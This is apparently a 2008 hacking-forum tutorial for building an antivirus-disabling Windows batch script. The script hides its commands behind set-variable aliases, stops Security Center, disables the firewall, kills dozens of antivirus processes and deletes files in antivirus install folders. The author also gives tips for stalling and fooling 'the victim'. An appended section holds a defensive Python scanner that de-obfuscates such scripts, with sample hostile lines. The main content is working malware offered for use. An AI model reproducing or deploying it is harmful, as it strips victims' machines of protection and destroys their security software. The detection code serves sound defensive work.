06-27-2008, 06:27 AM
Alright. I received a PM about this, so I'm going to make a tutorial on it. 0lid0 posted a REALLY LONG AV killer somewhere on the forum (to find it, search "AV killer"), but after a good read of it I find that it isn't all that good.
The things that are wrong or could be better are that it repeats itself randomly, so each AV is tskilled 2-5 times in the batch, and the deleter is just duplicated one after another. And let's not forget that its brilliant UD'ing makes it, drums, 33% detectable still! Whew, that's bad. So I will focus on making a much shorter and 100% UD AV killer! So let's get started.
Step one:
First of all we need to replace destructive commands with random words. In this case I'll be using my name a lot =P:
Quote:
set fun=net
set morefun=stop
set math=tsk
set ias=ill
set mathias=del
set beer=/a
From now on I will be using these words in %% instead of the commands.
Second step: Disable Firewall!
Quote:
%fun% %morefun% “Security Center”
%fun%sh firewall set opmode mode=disable
Third step: Task killing AVs
You do this by tskilling as many AVs as you know. In my case I've made a list of possible AVs, but you will see that my list is incomplete, so add to it or make a completely new one. NOTE: you can just write the beginning of it and add a *.
Quote:
%math%%ias% %beer% E-*
%math%%ias% %beer% av*
%math%%ias% %beer% fire*
%math%%ias% %beer% anti*
%math%%ias% %beer% spy*
%math%%ias% %beer% bullguard
%math%%ias% %beer% PersFw
%math%%ias% %beer% KAV*
%math%%ias% %beer% ZONEALARM
%math%%ias% %beer% SAFEWEB
%math%%ias% %beer% OUTPOST
%math%%ias% %beer% nv*
%math%%ias% %beer% nav*
%math%%ias% %beer% F-*
%math%%ias% %beer% ESAFE
%math%%ias% %beer% cle
%math%%ias% %beer% BLACKICE
%math%%ias% %beer% def*
%math%%ias% %beer% kav
%math%%ias% %beer% kav*
%math%%ias% %beer% avg*
%math%%ias% %beer% ash*
%math%%ias% %beer% aswupdsv
%math%%ias% %beer% ewid*
%math%%ias% %beer% guard*
%math%%ias% %beer% guar*
%math%%ias% %beer% gcasDt*
%math%%ias% %beer% msmp*
%math%%ias% %beer% mcafe*
%math%%ias% %beer% mghtml
%math%%ias% %beer% msiexec
%math%%ias% %beer% outpost
%math%%ias% %beer% isafe
%math%%ias% %beer% zap*
%math%%ias% %beer% zauinst
%math%%ias% %beer% upd*
%math%%ias% %beer% zlclien*
%math%%ias% %beer% minilog
%math%%ias% %beer% cc*
%math%%ias% %beer% norton*
%math%%ias% %beer% norton au*
%math%%ias% %beer% ccc*
%math%%ias% %beer% npfmn*
%math%%ias% %beer% loge*
%math%%ias% %beer% nisum*
%math%%ias% %beer% issvc
%math%%ias% %beer% tmp*
%math%%ias% %beer% tmn*
%math%%ias% %beer% pcc*
%math%%ias% %beer% cpd*
%math%%ias% %beer% pop*
%math%%ias% %beer% pav*
%math%%ias% %beer% padmin
%math%%ias% %beer% panda*
%math%%ias% %beer% avsch*
%math%%ias% %beer% sche*
%math%%ias% %beer% syman*
%math%%ias% %beer% virus*
%math%%ias% %beer% realm*
%math%%ias% %beer% sweep*
%math%%ias% %beer% scan*
%math%%ias% %beer% ad-*
%math%%ias% %beer% safe*
%math%%ias% %beer% avas*
%math%%ias% %beer% norm*
%math%%ias% %beer% offg*
Fourth step: Deleting AVs
You do this by deleting all exe files or all files with any extension in all of the AV directories. If you don't know the full name of the directory you can write some of the name and add "~1" to it. You will find this list incomplete as well.
Quote:
%mathias% /Q /F %ProgramFiles%\alwils~1\avast4\*.*
%mathias% /Q /F %ProgramFiles%\Lavasoft\Ad-awa~1\*.exe
%mathias% /Q /F %ProgramFiles%\kasper~1\*.exe
%mathias% /Q /F %ProgramFiles%\trojan~1\*.exe
%mathias% /Q /F %ProgramFiles%\f-prot95\*.*
%mathias% /Q /F %ProgramFiles%\tbav\*.dat
%mathias% /Q /F %ProgramFiles%\avpersonal\*.*
%mathias% /Q /F %ProgramFiles%\Norton~1\*.*
%mathias% /Q /F %ProgramFiles%\Mcafee\*.*
%mathias% /Q /F %ProgramFiles%\Norton~1\Norton~1\Norton~3\*.*
%mathias% /Q /F %ProgramFiles%\Norton~1\Norton~1\speedd~1\*.*
%mathias% /Q /F %ProgramFiles%\Norton~1\Norton~1\*.*
%mathias% /Q /F %ProgramFiles%\Norton~1\*.*
%mathias% /Q /F %ProgramFiles%\avgamsr\*.exe
%mathias% /Q /F %ProgramFiles%\avgamsvr\*.exe
%mathias% /Q /F %ProgramFiles%\avgemc\*.exe
%mathias% /Q /F %ProgramFiles%\avgcc\*.exe
%mathias% /Q /F %ProgramFiles%\avgupsvc\*.exe
%mathias% /Q /F %ProgramFiles%\grisoft
%mathias% /Q /F %ProgramFiles%\nood32krn\*.exe
%mathias% /Q /F %ProgramFiles%\nood32\*.exe
%mathias% /Q /F %ProgramFiles%\nod32\*.exe
%mathias% /Q /F %ProgramFiles%\nood32\*.exe
%mathias% /Q /F %ProgramFiles%\kav\*.exe
%mathias% /Q /F %ProgramFiles%\kavmm\*.exe
%mathias% /Q /F %ProgramFiles%\kaspersky\*.*
%mathias% /Q /F %ProgramFiles%\ewidoctrl\*.exe
%mathias% /Q /F %ProgramFiles%\guard\*.exe
%mathias% /Q /F %ProgramFiles%\ewido\*.exe
%mathias% /Q /F %ProgramFiles%\pavprsrv\*.exe
%mathias% /Q /F %ProgramFiles%\pavprot\*.exe
%mathias% /Q /F %ProgramFiles%\avengine\*.exe
%mathias% /Q /F %ProgramFiles%\apvxdwin\*.exe
%mathias% /Q /F %ProgramFiles%\webproxy\*.exe
%mathias% /Q /F %ProgramFiles%\panda software\*.*
When that is done and you have it all in ONE batch, you have yourself a 100% UD AV killer!! Nice!
TIPS:
Add a lot of spamming at the beginning of the batch, such as "MSG *" or starting programs. This will stall the victim so the batch can complete without being closed.
A good idea is to add "cls" in between each tskill and deletion, or it's going to look creepy for the victim, and he will close it immediately.
EDIT: please take time to answer the above poll!
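Seen from the defender's side, the `set` substitution in step one does not survive static expansion. The scanner below is an added example, not part of the original post: it resolves script-defined variables line by line and matches the expanded commands against tamper rules. The rule names and the short sample script are constructed for illustration.

```python
import re

# Constructed sample: a few lines in the style of the script in the post.
SAMPLE = r'''set fun=net
set morefun=stop
set math=tsk
set ias=ill
set mathias=del
set beer=/a
%fun% %morefun% "Security Center"
%fun%sh firewall set opmode mode=disable
%math%%ias% %beer% avg*
%mathias% /Q /F %ProgramFiles%\kasper~1\*.exe
echo done
'''

# Tamper rules applied to the expanded command line (rule names are hypothetical).
RULES = [
    ("service_stop", re.compile(r'^net\s+stop\b', re.I)),
    ("firewall_disable", re.compile(r'^netsh\s+(adv)?firewall\b.*\b(disable|off)\b', re.I)),
    ("process_kill", re.compile(r'^(tskill|taskkill)\b', re.I)),
    ("program_files_delete", re.compile(r'^(del|erase)\b.*%ProgramFiles', re.I)),
]
SET_RE = re.compile(r'^\s*set\s+([^=\s]+)=(.*)$', re.I)
VAR_RE = re.compile(r'%([^%\s]+)%')

def expand(script):
    """Resolve script-defined %var% references; yield (lineno, raw, expanded)."""
    env = {}
    for n, raw in enumerate(script.splitlines(), 1):
        # Variables the script never set (e.g. %ProgramFiles%) stay as written.
        line = VAR_RE.sub(lambda m: env.get(m.group(1).lower(), m.group(0)), raw).strip()
        m = SET_RE.match(line)
        if m:
            env[m.group(1).lower()] = m.group(2)  # batch variable names are case-insensitive
        yield n, raw, line

def scan(script):
    """Return (lineno, rule, expanded, hidden); hidden is True when the raw
    line did not match the rule until its variables were expanded."""
    findings = []
    for n, raw, line in expand(script):
        for name, rx in RULES:
            if rx.search(line):
                findings.append((n, name, line, not rx.search(raw.strip())))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A high share of `hidden` findings is itself a signal: legitimate administrative scripts rarely assemble `net`, `netsh`, `tskill` or `del` out of variable fragments.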
